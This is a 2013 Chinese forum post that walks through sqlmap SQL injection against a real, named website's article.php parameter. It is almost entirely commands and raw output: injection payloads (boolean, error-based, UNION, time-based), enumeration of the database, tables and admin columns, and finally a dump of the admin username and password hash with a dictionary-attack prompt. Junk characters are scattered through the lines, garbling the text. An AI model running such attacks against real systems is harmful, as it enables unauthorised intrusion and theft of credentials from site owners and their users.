找回密码
 立即注册
查看: 3354|回复: 0
打印 上一主题 下一主题

sqlmap实例注入mysql

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 22:18:49 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db7 g3 P. `- t/ K$ {; ], q5 u4 L
ms "Mysql" --current-user       /*  注解:获取当前用户名称
8 K  e/ L6 @% P. `    sqlmap/0.9 - automatic SQL injection and database takeover tool
2 v  g; L/ e, d& w* o    http://sqlmap.sourceforge.net
  • starting at: 16:53:54
    . J, [" h2 q) N[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    ' K2 e( U# n$ h! w session file
    * A1 s! E0 z  @% O% S[16:53:54] [INFO] resuming injection data from session file/ D% `& Z/ d- v. X5 H! w1 W
    [16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    - \8 G  S' q$ F* K$ H. o2 a[16:53:54] [INFO] testing connection to the target url5 q% |3 D1 o" M: n* F2 \% _2 Q
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque( D: o+ M9 N# n8 W3 M( |$ v5 [
    sts:; M5 }! `  ?9 r) P  K
    ---1 Y6 g4 T8 c% q  K' d
    Place: GET3 G  e( ]% E9 Q- ^" p4 D- d9 D
    Parameter: id. U# ^$ D6 M$ Z! L
        Type: boolean-based blind8 C  @8 M6 k3 h; D
        Title: AND boolean-based blind - WHERE or HAVING clause" C: `/ F+ G! V
        Payload: id=276 AND 799=799
    . A& |. E  V0 m9 D8 L    Type: error-based
    2 ]; x7 N( N7 p. ^/ k, u$ i4 J2 f    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    0 B7 h* c3 ]7 o    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    8 j% H: \; |* P* Y( M2 B120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    3 A) G& c/ y7 V' \/ c8 N),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    6 @5 v  \. ~" U- \8 G, A    Type: UNION query+ P7 w' O- h* ~: }0 V6 j6 U
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    7 a3 r) S) R$ t0 a  l& @    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR3 Q" V2 E+ w* B! [
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),6 i% q- L% Q4 u+ m: b
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#  n6 N2 \4 l( Q' H
        Type: AND/OR time-based blind
    5 M( N1 \. D* N1 B    Title: MySQL > 5.0.11 AND time-based blind
    ' p/ g0 S$ V( R8 A  e" Q    Payload: id=276 AND SLEEP(5)& G; }. a3 v9 G( `: |' O# c7 G% P
    ---
    9 ^4 O5 J$ Q& U- ][16:53:55] [INFO] the back-end DBMS is MySQL
    # Q% k# H8 L8 ^; U6 Lweb server operating system: Windows9 o, ]1 |6 c7 m
    web application technology: Apache 2.2.11, PHP 5.3.00 V& q  a+ ]$ ^) F; P8 ]" ^
    back-end DBMS: MySQL 5.0
    8 _; s7 X  }  ^2 N[16:53:55] [INFO] fetching current user
    " m: O: Q: O- u" `) ucurrent user:    'root@localhost'   
    . b7 x3 o% e) h5 C3 t7 \/ l[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    % u. S8 {6 l9 X. R5 `tput\www.wepost.com.hk'
  • shutting down at: 16:53:586 d) W0 D; f8 U! ?

    * u0 x* C! d% V& S  oD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    " u) P. H9 B' {( {. j) M4 k; nms "Mysql" --current-db                  /*当前数据库& ^$ e2 g' ^2 M
        sqlmap/0.9 - automatic SQL injection and database takeover tool/ Z( t, R6 t  u  F
        http://sqlmap.sourceforge.net
  • starting at: 16:54:16
    ( e5 S+ G0 J8 p[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    ! ~! {" J' @: ]+ f* u. t/ i session file
    # e6 Y/ c2 {  i7 L[16:54:16] [INFO] resuming injection data from session file
    * p5 z; f7 w4 u' i' G  R[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file: I& K  E3 C8 I3 g
    [16:54:16] [INFO] testing connection to the target url; u* Q) Z. L8 ]0 r, E
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    8 }" z8 X4 h, m4 l! ?$ G$ l4 u6 hsts:
    & g" Y0 `1 V% |+ n---
    ; c8 w# D  Z; I5 ?% x2 ^& vPlace: GET  m* [3 k6 k! I0 ^
    Parameter: id
    / B' v# U/ w# w8 h    Type: boolean-based blind
    + S. i; O4 M) `/ H! h1 P  I; a9 Z    Title: AND boolean-based blind - WHERE or HAVING clause
    - U" {* u3 i; t# @3 }) C+ K- n    Payload: id=276 AND 799=799- {3 J3 S: E2 v& C- o8 Y$ Z" L6 U
        Type: error-based$ q2 L9 F$ x( Y8 @7 `" e4 {
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    9 {3 W% a+ U9 ?    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,; n, P' {0 o, ~
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    3 X* H5 B* H8 ?. w$ A: K6 X0 u. T),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)0 n* z) [* s6 x9 x- x3 a5 N/ [
        Type: UNION query5 N+ p- M; u5 N7 [7 a
        Title: MySQL UNION query (NULL) - 1 to 10 columns6 ~, O" Z( K' _% O) Q, [
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    ! L) ~: ~. \% H  ?) ?. w9 G" H(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),0 s- j/ [* g2 t/ t, t" o- s
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    $ Y% j+ C6 s% O$ L' ]7 @    Type: AND/OR time-based blind
    ) d' k$ D$ W: ^0 s$ m' e! @8 y    Title: MySQL > 5.0.11 AND time-based blind
    + C, }2 w2 n0 b3 p( s    Payload: id=276 AND SLEEP(5)7 P! @: S& Y8 P' p* n4 z
    ---
    ' q/ l9 M& N' Z/ d" C  Z) p& b( }) i[16:54:17] [INFO] the back-end DBMS is MySQL
    * p! t+ W: L/ o6 [# Z) pweb server operating system: Windows
    - S& N: i/ O& b( ~web application technology: Apache 2.2.11, PHP 5.3.0) k2 m. o# q; n7 i
    back-end DBMS: MySQL 5.04 N( _, p" D( W
    [16:54:17] [INFO] fetching current database9 [8 V" [/ Y3 f2 q
    current database:    'wepost'3 y5 R# {/ [# p+ t6 b7 ?
    [16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    2 y0 x+ |( \3 ~, }  \3 btput\www.wepost.com.hk'
  • shutting down at: 16:54:18/ Q/ Z8 h8 m8 {0 U
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    4 e5 B$ R0 A; I$ oms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名
    - L1 m  s& |" s    sqlmap/0.9 - automatic SQL injection and database takeover tool$ ~( O4 S$ w5 F: J
        http://sqlmap.sourceforge.net
  • starting at: 16:55:25- E: w; ?1 v  }0 O! p9 e
    [16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as7 |) ~0 D9 G& e  f* F$ `$ r
    session file
    2 U! s, Y% y: j4 `& w0 _0 G[16:55:25] [INFO] resuming injection data from session file
    # U% o6 T" @0 ^( S# l* g9 m[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file5 f- }' L5 X5 e- K8 Y8 |& b- f
    [16:55:25] [INFO] testing connection to the target url
      h3 k/ b* T3 E3 b) J- n$ usqlmap identified the following injection points with a total of 0 HTTP(s) reque
    8 }# F% E4 s7 i' t. H, N3 p$ h1 asts:
    ' b3 o# T* f/ ]. I6 a2 d# x---8 R9 C: q( u' H
    Place: GET
    & B% r) Y7 h6 X7 v* r# m2 `Parameter: id
    3 M5 w, E1 m" f    Type: boolean-based blind6 O! T7 P8 C7 P. g9 w3 r& X' j
        Title: AND boolean-based blind - WHERE or HAVING clause
    : v/ @, i; s$ V3 K/ \0 x    Payload: id=276 AND 799=799- C  a3 S# p/ V
        Type: error-based
    . N+ n; y' b: ^- s5 P' e/ V    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause7 i! r' I, V# Z* F& X
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    , F8 R$ M' z& T& r2 j) x120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    % h6 n& ?# l( v' j),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    0 L) f7 F6 C6 F/ R    Type: UNION query
    5 G8 w; d9 x. p7 O    Title: MySQL UNION query (NULL) - 1 to 10 columns9 m1 ?# ~0 Z: j: `
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    2 c8 t$ @9 i/ a) y( L2 ^( T(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),! Q4 X! V8 L7 K1 Z1 O5 H
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    1 S9 g9 E3 H- b    Type: AND/OR time-based blind
    + W" K' v- d) ?0 f2 n    Title: MySQL > 5.0.11 AND time-based blind
    ! B/ J0 h0 u- R/ l4 j" `. s    Payload: id=276 AND SLEEP(5)
    * J' T4 ~. P# E* p! K---1 Y6 j% K0 U, N$ X" c
    [16:55:26] [INFO] the back-end DBMS is MySQL, Y& n& Z( q: _$ g9 N
    web server operating system: Windows
    " C- C8 X5 }# u- Jweb application technology: Apache 2.2.11, PHP 5.3.0% u( Q/ Q! f; M
    back-end DBMS: MySQL 5.0) W, V; R) r, F9 f; b1 G* R3 G
    [16:55:26] [INFO] fetching tables for database 'wepost'9 h1 \4 [: Y2 B* g& ^: R( Z
    [16:55:27] [INFO] the SQL query used returns 6 entries1 @0 i$ y; h; Y
    Database: wepost( ?; ]6 q# L4 P( t9 m7 [
    [6 tables]! H, ^5 N9 n8 ?* `
    +-------------+
    9 \5 N, n0 s# n3 W| admin       |
    + h7 a, F9 V$ w- ^; ?| article     |3 Q: u4 X$ A3 V- ~
    | contributor |! U; Z! h' G  ]4 n
    | idea        |
    ; n2 e$ l  ?; ~2 X, s! J& F  _| image       |' q: o8 G) H, V* k4 ?8 n$ q- ?% {
    | issue       |
    & M: x5 ]! N2 {+ A3 u5 ~' q3 _+-------------+
    0 }) M& S  M1 [! F[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
      M; r$ u6 X5 ~% }tput\www.wepost.com.hk'
  • shutting down at: 16:55:33
    0 u9 X9 o+ l2 S! c7 v. i
    ! C1 z2 D6 m  H% X' C. w% _D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    : g7 [: r! Q0 n! Jms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名
      B: F5 H+ v8 q0 i* n    sqlmap/0.9 - automatic SQL injection and database takeover tool; z9 \6 [4 L" ~+ {3 y
        http://sqlmap.sourceforge.net
  • starting at: 16:56:06) q0 P, G8 x% g8 I" ^: o, ~- ?/ e, m
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque1 B: f" g- j0 A3 r! ~$ E. o. ?$ y
    sts:8 u: g6 l0 k9 J9 b- x  L1 T) J
    ---% s5 c0 V* b' m. U  {
    Place: GET
    1 n1 h' o! i, k8 }1 K0 Q% ]. yParameter: id- W1 F0 E, v7 X3 S5 p6 y4 |2 Z
        Type: boolean-based blind5 h. Q* U+ L+ h' p
        Title: AND boolean-based blind - WHERE or HAVING clause
    * n& T0 @0 v2 v, H# t    Payload: id=276 AND 799=799/ a# w3 U3 s% e( F. I3 X$ t7 `# ?
        Type: error-based
    1 U, \3 C- M9 a7 z: P& d* |- f1 M    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    1 Y- b! ^: i/ I; I! e# V# r$ y    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,9 z' r0 F6 x: F5 N
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58( w+ ]6 N' A& K  ~1 d
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    ! T! c: E9 H* }( c3 [0 i8 s    Type: UNION query
    2 Y  D' T1 x! Q0 ?    Title: MySQL UNION query (NULL) - 1 to 10 columns
    : ~8 `4 n; D( Q6 Y0 f" o9 i& x    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR+ H5 C' C! j$ ?: `$ l  Y8 |
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),/ T0 [, V* c+ F
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    0 e) U  Q5 k: q2 n4 X8 \    Type: AND/OR time-based blind! m) W" b, q& i/ @/ v7 B' @3 P  w
        Title: MySQL > 5.0.11 AND time-based blind
    7 v/ U8 y- M) z. D    Payload: id=276 AND SLEEP(5)5 e; ^: \6 A( W# B
    ---- V- A6 E' ?; C
    web server operating system: Windows
    ; y; L, u* d+ {3 A7 Gweb application technology: Apache 2.2.11, PHP 5.3.0
    / c9 d' l& `$ n2 [- E# ]back-end DBMS: MySQL 5.0
    - X0 Y* A- S7 ]% g" u[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
    , m$ `/ ]9 }5 J+ L% E' ?ssion': wepost, wepost* M9 |8 P9 K8 I8 R
    Database: wepost7 ^0 Q/ N! U2 [
    Table: admin
    1 p3 ~$ x; E9 y' G& \[4 columns]
    / V! k: a0 Y" L) ^& E9 S5 w+----------+-------------+
    ' v1 B: M; ~1 o1 f/ t, }5 s| Column   | Type        |5 q3 [7 }% ~; z4 R$ ^& p
    +----------+-------------+
    . V" O, N+ I9 t/ }3 Q, z! R| id       | int(11)     |
    7 a% y* ^- V; _, y* ^| password | varchar(32) |" g! u; u) E0 J, u5 J4 P8 T
    | type     | varchar(10) |
    % R' N0 I$ _% c* q3 a| userid   | varchar(20) |; \# c9 y: p5 W- Q! S& ~' ~9 v
    +----------+-------------+; ~; V( ~( g* U
  • shutting down at: 16:56:19" S7 d% s. e1 ^5 _& X
    + L, n& ~2 M' l  w5 [
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    ! w0 a  p, g' W9 t& g3 K" Cms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容) L- y2 [4 z5 F+ ]3 f% M0 B- }
        sqlmap/0.9 - automatic SQL injection and database takeover tool* R' e& O) W- d$ {* z0 Q
        http://sqlmap.sourceforge.net
  • starting at: 16:57:14& V# H8 U3 H, o2 q/ X
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    / T6 _, W  b/ W/ K3 t! H9 n' ^. g9 hsts:' V! E+ D4 `0 b9 G
    ---
    % p5 k5 X0 r5 k# {& ?3 x/ ZPlace: GET
    2 v( J5 J2 S6 {6 w: o$ q  f) a% PParameter: id
      w7 G7 I4 \4 ^, e. t    Type: boolean-based blind
    9 v  q, @' `2 J$ f    Title: AND boolean-based blind - WHERE or HAVING clause. g9 p& \& y$ L+ o0 N
        Payload: id=276 AND 799=799
    * J* C7 G! K* m( @8 Y5 k6 ~( T    Type: error-based0 v- N: ?* J, Q# k/ c  g
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause$ p4 j' f( w) y% a" F
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    9 n3 ?* }: t4 l7 y! g- y120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    ! d. k( d4 w, l),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    & c# m. w4 w. w# b! o; k    Type: UNION query) X: P, P; u+ V
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    ' w% R( n' ^; D, |6 G" T. X* N$ j    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    ! c8 ]- p# Y: y0 J(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),! E' N& p/ n) f3 W2 o9 [
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#$ i& X- D! C# ]: x6 _2 G5 |2 S# {
        Type: AND/OR time-based blind9 u0 L( a) z& D3 A! g+ O
        Title: MySQL > 5.0.11 AND time-based blind
    3 G5 e. ]/ o8 ]  Y+ f    Payload: id=276 AND SLEEP(5)/ Z1 [4 n2 d0 H* O( u
    ---
    6 N8 H/ E: S- D3 I9 f. ^web server operating system: Windows
    7 o6 M% z7 e. N/ z( i8 G# c% {3 Pweb application technology: Apache 2.2.11, PHP 5.3.0% x; \) F( x5 a
    back-end DBMS: MySQL 5.0
    9 r( p& J' o! u9 erecognized possible password hash values. do you want to use dictionary attack o
    8 ?* l. K; [2 j. un retrieved table items? [Y/n/q] y0 T  P# b7 ?/ f
    what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
      j' z5 C6 c3 t% qdo you want to use common password suffixes? (slow!) [y/N] y
    2 n1 L7 t- a6 V) mDatabase: wepost1 ~0 P7 @# S$ T( L( @9 t8 h( S
    Table: admin
    9 G8 n8 v0 N" Y) v& T[1 entry]
    8 o8 K  R+ }% l# O2 ]4 i- Q2 T+----------------------------------+------------+1 r5 \/ e+ _; t
    | password                         | userid     |0 ^! l6 y9 U% a; z
    +----------------------------------+------------+0 c9 X; k& t6 s( M. Q3 d- m
    | 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |& j' l9 _: E. \4 H1 @4 Z
    +----------------------------------+------------+; z1 i/ G+ b2 m9 Q, X+ U1 D  x
  • shutting down at: 16:58:14
    , x) A, @1 J' r
    & A# u8 G: I! t! R: N. HD:\Python27\sqlmap>
  • 回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    快速回复 返回顶部 返回列表